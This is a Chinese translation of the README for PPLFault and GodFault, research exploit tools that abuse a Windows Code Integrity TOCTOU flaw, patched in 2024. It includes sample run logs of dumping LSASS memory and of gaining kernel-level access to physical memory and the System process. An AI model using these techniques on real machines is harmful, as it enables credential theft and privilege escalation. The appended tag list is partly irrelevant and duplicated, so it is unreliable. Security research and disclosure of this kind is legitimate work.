gabriellandau/PPLFault

# PPLFault 由 [Elastic Security](https://www.elastic.co/security-labs/) 的 [Gabriel Landau](https://twitter.com/GabrielLandau) 发布。 源自在 [Black Hat Asia 2023](https://www.blackhat.com/asia-23) 展示的 [PPLdump Is Dead. Long Live PPLdump!](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052)。 [](http://www.youtube.com/watch?v=5xteW8Tm410 "PPLdump Is Dead. Long Live PPLdump!") ## PPLFault **2024-02 更新：Microsoft 于 2024-02-13 修补了 PPLFault。相关讨论请参见 [此推文](https://x.com/GabrielLandau/status/1757818200127946922?s=20)。** 利用 Windows Code Integrity 中的 TOCTOU 漏洞实现以 WinTcb-Light 权限执行任意代码，然后转储指定进程。关于该漏洞的更多详情，请参阅我的 [幻灯片](http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf) 和/或 [演讲](https://x.com/GabrielLandau/status/1707773387731272085)。 ### 示例输出 ``` PS C:\Users\user\Desktop> cmd /c ver Microsoft Windows [Version 10.0.25346.1001] PS C:\Users\user\Desktop> tasklist | findstr lsass lsass.exe 992 Services 0 76,620 K PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection Type Signer ---- ------ ProtectedLight Lsa PS C:\Users\user\Desktop> dir *.dmp PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp [+] No cleanup necessary. Backup does not exist. [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint [+] Benign: C:\Windows\System32\EventAggregation.dll.bak [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll [+] Ready. Spawning WinTcb. [+] SpawnPPL: Waiting for child process to finish. [+] FetchDataCallback called. [+] Hydrating 90112 bytes at offset 0 [+] Switching to payload [+] Emptying system working set [+] Working set purged [+] Give the memory manager a moment to think [+] Hydrating 90112 PAYLOAD bytes at offset 0 [+] Dump saved to: lsass.dmp [+] Dump is 74.9 MB [+] Operation took 937 ms PS C:\Users\user\Desktop> dir *.dmp Directory: C:\Users\user\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/1/2023 11:18 AM 78581973 lsass.dmp ``` ## GodFault 利用与 PPLFault 相同的 TOCTOU 漏洞。但它不转储进程，而是迁移到 CSRSS，并利用 [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L69-L81) 中的 `win32k!NtUserHardErrorControlCall` 漏洞将 `KTHREAD.PreviousMode` 从 `UserMode` (1) 递减为 `KernelMode` (0)。它通过打开通常无法从 `UserMode` 访问的 `\Device\PhysicalMemory`（权限为 `SECTION_ALL_ACCESS`）来证明获得了“上帝模式”访问权。 ### 示例输出 ``` C:\Users\user\Desktop>GodFault.exe -v [?] Server does not appear to be running. Attempting to install it... [+] No cleanup necessary. Backup does not exist. [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint [+] CSRSS PID is 772 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure [+] Ready. Spawning WinTcb. [+] SpawnPPL: Waiting for child process to finish. [+] FetchDataCallback called. [+] Hydrating 90112 bytes at offset 0 [+] Switching to payload [+] Emptying system working set [+] Working set purged [+] Give the memory manager a moment to think [+] Hydrating 90112 PAYLOAD bytes at offset 0 [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success [+] Opened \Device\PhysicalMemory. Handle is 0x1b4 [+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x1c0 [+] Press any key to continue... [+] No cleanup necessary. Backup does not exist. ``` ## Python 无需 CloudFilter API 即可实现以 WinTcb-Light 权限执行任意代码的 PoC。参见 [python/README.md](python/README.md)。 ## 测试平台 | | Windows 11 22H2 22621.1702 (2023年5月) | Windows 11 Insider Canary 25346.1001 (2023年4月) | | - | - | - | | PPLFault | ✔️ | ✔️ | | GodFault | ✔️ | ❌ Insider PreviousMode 缓解措施会导致 [蓝屏](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) | # 许可证 PPLFault 受 [ELv2 许可证](LICENSE.txt) 保护。它使用了来自 SystemInformer 的 [phnt](https://github.com/winsiderss/systeminformer/tree/25846070780183848dc8d8f335a54fa6e636e281/phnt)，遵循 [MIT 许可证](phnt/LICENSE.txt)。 # 致谢 灵感来源于 [Clément Labro](https://infosec.exchange/@itm4n) 的 [PPLdump](https://github.com/itm4n/PPLdump)，Microsoft 已于 2022 年 7 月 [修补](https://itm4n.github.io/the-end-of-ppldump/) 了该项目。 [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD) 由 [Austin Hudson](https://twitter.com/ilove2pwn_) 创建，并在 Microsoft 修补 PPLdump 时发布。

标签：Black Hat, C++, CVE, Elastic Security, LSASS 转储, Multi-Agent, PPL 绕过, RFI远程文件包含, Shellcode, TOCTOU, UML, Windows 安全, WinTcb, 代码完整性, 内核漏洞, 凭据窃取, 反作弊绕过, 客户端加密, 客户端加密, 技术调研, 提权, 数字签名, 数据擦除, 逆向工具